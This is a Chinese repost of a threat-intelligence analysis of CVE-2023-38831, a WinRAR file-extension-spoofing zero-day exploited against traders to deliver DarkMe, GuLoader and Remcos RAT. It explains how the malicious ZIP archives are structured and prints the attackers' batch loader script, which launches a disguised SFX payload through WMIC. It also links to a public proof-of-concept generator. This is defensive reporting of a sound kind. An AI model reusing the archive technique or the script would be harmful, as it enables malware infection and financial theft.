在全球拥有超过 5 亿用户,解压缩工具是最流行的压缩工具之一。您可能很难找到从未下载或打开过这个重要工具的人。如果有人收到包含恶意内容的电子邮件中的存档,他们很可能会使用 WinRAR 打开它。因此,威胁行为者会投入时间来识别该程序以及互联网用户常用的其他流行程序中的漏洞。
2023 年 7 月 10 日,在研究DarkMe恶意软件的传播过程中IB组威胁情报单位在 WinRAR 处理 ZIP 文件格式时遇到了一个以前未知的漏洞。通过利用该程序中的漏洞,威胁参与者能够制作 ZIP 档案,作为各种恶意软件系列的载体。武器化的 ZIP 档案在交易论坛上分发。一旦提取并执行,恶意软件就允许威胁行为者从经纪人账户中提取资金。该漏洞自 2023 年 4 月起就已被利用。
主要发现
-
Group-IB 威胁情报部门发现自2023 年 4 月 以来 WinRAR 中存在一个零日漏洞
-
网络犯罪分子正在利用一个漏洞来欺骗文件扩展名,这意味着他们能够在伪装成“.jpg”、“.txt”或任何其他文件格式的存档中隐藏恶意脚本的启动
-
该漏洞已报告给RARLAB,随后发布了新版本的 WinRAR
-
该漏洞已报告给MITRE Corporation,并被分配为CVE-2023-38831。
-
精心制作的 ZIP 存档用于提供各种恶意软件系列:DarkMe、GuLoader、Remcos RAT
-
ZIP 档案在交易者的专业论坛上分发
-
截至发帖时,仍有130 名交易者的设备受到感染。Group-IB 无法确认因该漏洞而被感染的设备总数。
-
感染设备后,网络犯罪分子从经纪人账户中提取资金。财务损失总额仍未知。
-
网络犯罪分子正在利用此漏洞来提供与绿盟科技描述的DarkCasino活动中使用的相同工具(第1部分,第2部分)。
最初,我们的研究使我们相信这是一种已知的进化脆弱性此前由安全研究员Danor Cohen 于 2014 年发现。观察到一种修改 ZIP 标头以欺骗文件扩展名的方法,但进一步的调查表明情况并非如此。相反,我们的分析揭示了 WinRAR 中存在一个新漏洞。
途径传播(攻击)
所发现的专门针对交易者的ZIP 档案是由该活动背后的威胁行为者在公共论坛上发布的,交易者经常在公共论坛上进行讨论并相互分享有用的信息。在大多数情况下,存档会附加到帖子中(如下图 1 所示),但在某些情况下,恶意 ZIP 存档会分发到免费使用的服务上,以存储名为 catbox.moe 的文件。Group-IB 总共发现这些恶意 ZIP 档案发布在国外流行的交易论坛上。
打开恶意 ZIP 存档的潜在后果。当受害者打开此类文件时,他们会看到什么?好吧,这取决于他们遇到的诱饵文本,在这种特殊情况下,诱饵文本发布在交易论坛上。例如,在这个计划中,我们看到网络犯罪分子假装提供“比特币交易的最佳个人策略”(见图 3 和图 4),并将恶意档案附加到这些帖子中。在其他情况下,攻击者可以访问论坛帐户并在现有线程中共享有害文件,假装它们是计算不同指标的脚本集合,例如名为“Omnis Averages.zip”的文件
确定的所有档案都是使用相同的方法创建的。它们也都具有类似的结构,由诱饵文件和包含恶意文件和未使用文件的文件夹组成。如果用户打开诱饵文件,该文件显示为 .txt、.jpg。或 WinRAR 中的其他文件扩展名,而是执行恶意脚本。
文件扩展名欺骗漏洞利用的序列图 (CVE-2023-38831)
在发现这个过程后,Group-IB 分析人员得出结论,网络犯罪分子正在利用WinRAR 中先前未知的漏洞,后来分配了编号 CVE-2023-38831。此漏洞允许恶意行为者通过创建带有欺骗扩展的诱饵来隐藏恶意脚本的启动。
漏洞利用分析
网络犯罪分子正在利用一个漏洞来欺骗文件扩展名,这意味着他们能够在伪装成“.jpg”、“.txt”或任何其他文件格式的存档中隐藏恶意代码的启动。他们创建一个包含恶意和非恶意文件的 ZIP 存档。当受害者打开特制的存档时,受害者通常会看到一个图像文件和一个与该图像文件同名的文件夹。
包含具有欺骗性扩展名的文件的恶意 ZIP 存档示例
如果受害者单击可以伪装成图像的诱饵文件,则会执行一个脚本来启动下一阶段的攻击。(下图)说明了该过程
组托管XDR流程创建图
调查过程中,我们注意到 ZIP 存档的文件结构发生了修改。存档中有两个文件:图片和脚本。启动脚本而不是打开图像。该脚本的主要目的是启动下一阶段的攻击。这是通过运行自身的最小化窗口来完成的。然后它会搜索两个特定文件,即“Screenshot_05-04-2023.jpg”和“Images.ico”。JPG 文件是受害者最初打开的图像。“Images.ico”是一个 SFX CAB 存档,旨在提取和启动新文件。下面是该脚本的示例:
@echo offif not DEFINED IS_MINIMIZEDset IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exitcd %TEMP%for /F "delims=" %%K in ('dir /b /s "Screenshot_05-04-2023.jpg"') dofor /F "delims=" %%G in ('dir /b /s "Images.ico"') doWMIC process call create "%%~G" && "%%~K" && cd %CD% && exitexit
为了了解该漏洞的工作原理,我们创建了两个模仿已发现存档结构的存档。两个存档都包含一个图像文件,每个存档还包含一个内部文件夹,其中包含一个存储脚本的文件,从而触发消息框显示。接下来,我们修改了其中一个存档,以类似于网络犯罪分子使用的存档,并比较了 WinRAR 在每种情况下的行为。
具体来说,我们想要确定在打开上一步中创建的存档时,将在%TEMP%/%RATMPDIR%文件夹中创建哪些文件。在原始 ZIP 文件中,仅创建 image.jpg 文件。然而,对于特制的 ZIP 存档,该文件夹的内容也将被提取。
比较 WinRAR 打开不同压缩文件时创建的文件列表
正如您所看到的,对于存档的修改版本,WinRAR 会提取这两个文件,确保攻击至少部分成功。为了简洁起见,我们不会关注该漏洞的所有细节,而是提供简短的解释。
当 WinRAR 尝试打开用户想要访问的文件时,攻击的主要阶段发生。ShellExecute函数接收到错误的参数来打开文件。图片的文件名与搜索条件不匹配,导致其被跳过。不是找到想要的图片,而是发现并执行批处理文件。
参考:
-
创建 CVE-2023-38831 winrar 文件进行测试
https://github.com/BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc
-
Exploiting CVE-2023-38831 – WinRar (Remote Code Execution) (English)
https://www.youtube.com/watch?v=t4wU3xvOl6M
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
原文始发于微信公众号(Ots安全):WinRAR 中的 CVE-2023-38831在野被利用(分析复现)
